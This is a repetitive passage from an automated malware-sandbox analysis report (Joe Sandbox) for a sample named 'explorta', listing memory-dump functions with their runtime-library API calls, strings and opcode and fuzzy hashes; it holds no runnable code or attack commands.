                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                          • Instruction ID: 79a7c3c71ac9510db399e5291f2f6254bf9aa818c980a4fef627cc6fb4a9a559
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E0EC72926229EFCB15DBD8C948E8AFBECFB89B54B66449AF501D3151C270DE00C7D1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005A0210 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Ks==$Muso$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 0-412186370
                                                                                                                                                                                                                                          • Opcode ID: 3507a022b6ccb51f684521d9200f82a628953365df72b54d40a2803023c32dea
                                                                                                                                                                                                                                          • Instruction ID: e7fd4b4215347bde0536a05d3320a8d9a45d711940c29aa187ddb66d469a53bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3507a022b6ccb51f684521d9200f82a628953365df72b54d40a2803023c32dea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C151D131904299AFEF25DB64CC49BDEBFB4FF0A300F044199E54867682C7745A84CFA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005C4020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 148COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 005C4057
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 005C405F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 005C40E8
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 005C4113
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 005C4168
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: 01\$csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-103147319
                                                                                                                                                                                                                                          • Opcode ID: cfc03c66b8e612702aca0fe028c7a0dbb6d697f2e4d4669dd513d1de6f415a17
                                                                                                                                                                                                                                          • Instruction ID: 8e1b9f4c6d68cb1972a4721f04961d565ef1cd32c2b978ec539432c736836cf6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfc03c66b8e612702aca0fe028c7a0dbb6d697f2e4d4669dd513d1de6f415a17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4451B134A002499FCF10DFA8C899FAE7FB5BF55314F188059E954AB352D732AA45CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005C6979 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsrchr
                                                                                                                                                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                          • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                          • Opcode ID: 00da5d6977894af658f42055de084275accb8af526bf8dbfa5d59068ac8bd7a5
                                                                                                                                                                                                                                          • Instruction ID: a5583b4ee3524de0b67522b1d398c9fa83b76ba8d9acb8b3d7a8046ccf8adf29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00da5d6977894af658f42055de084275accb8af526bf8dbfa5d59068ac8bd7a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2301C83BA047662D662460999C02F3B5F9CBFC5BB0B19402EFC59F71C1EE65DD0281D0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00592DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 32384418-0
                                                                                                                                                                                                                                          • Opcode ID: 88b505daed9ecca4a39edf583dd9e37727cddadf052ce5519101b249a6d53da9
                                                                                                                                                                                                                                          • Instruction ID: b38190a9d1ba319c67d9ee0ed2666cd88ec170f392579d3dffd4a3436e67d1eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88b505daed9ecca4a39edf583dd9e37727cddadf052ce5519101b249a6d53da9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17A1DF71901206AFEF21DB64C949BAABFB8FF56314F048129E915D7242EB34EA04CBD1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005A1710 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 0-1606216832
                                                                                                                                                                                                                                          • Opcode ID: 7f523ac7acd504a31594e005ab2f6c57b96052632a0dde9cd0fbee5c018aa7f3
                                                                                                                                                                                                                                          • Instruction ID: 15614a32333d246f0d8c972f8a58f3f94879129c34b1927a410ee5d9ec143fe8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f523ac7acd504a31594e005ab2f6c57b96052632a0dde9cd0fbee5c018aa7f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC419F309052999FEB649F18CC5ABDEBFB0BF46704F1401D8E54826282CB755AC8CF92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005CC260 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: 2be3246e1f92ff9055cdda0d2c6c42c9db80f0564b8feef83651b155efb1fb25
                                                                                                                                                                                                                                          • Instruction ID: bdafeee289858c18d9cce834649f948d655450e615e4ef665d62759a1c5803a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2be3246e1f92ff9055cdda0d2c6c42c9db80f0564b8feef83651b155efb1fb25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21B103329042869FDB15CFA8C891FBEBFA5FF95340F14856ED449DB241D6349E41CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005AB352 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 65dfb36a20c7499c53474984fdd5248a203f887ba7210369f103cd10aba8ab59
                                                                                                                                                                                                                                          • Instruction ID: 60d4f99e8332d86bba3626806fa715f5f4478649bfb46df34e4f629465534490
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65dfb36a20c7499c53474984fdd5248a203f887ba7210369f103cd10aba8ab59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9214175A0011A9FDF00EBA4DC8A9BEBFB9FF49710F100059F601A7292DB349D019BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005CEAD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                          • String ID: 8"_$`'_
                                                                                                                                                                                                                                          • API String ID: 3903695350-2958148901
                                                                                                                                                                                                                                          • Opcode ID: ea9ea188d403dcbe42bf75165a192db1df18f0d6298ae0a010bae4053df90a2e
                                                                                                                                                                                                                                          • Instruction ID: 122f995d656c210e55faf96eb6c2a11580244ad3f5e0150420b5c7bab5edbba8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea9ea188d403dcbe42bf75165a192db1df18f0d6298ae0a010bae4053df90a2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46313D716006059FDF21AAB8D84AF667FE9FF80318F14842DE45AD7255DE34ED408B11
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:2.7%
                                                                                                                                                                                                                                          Total number of Nodes:1656
                                                                                                                                                                                                                                          Total number of Limit Nodes:63
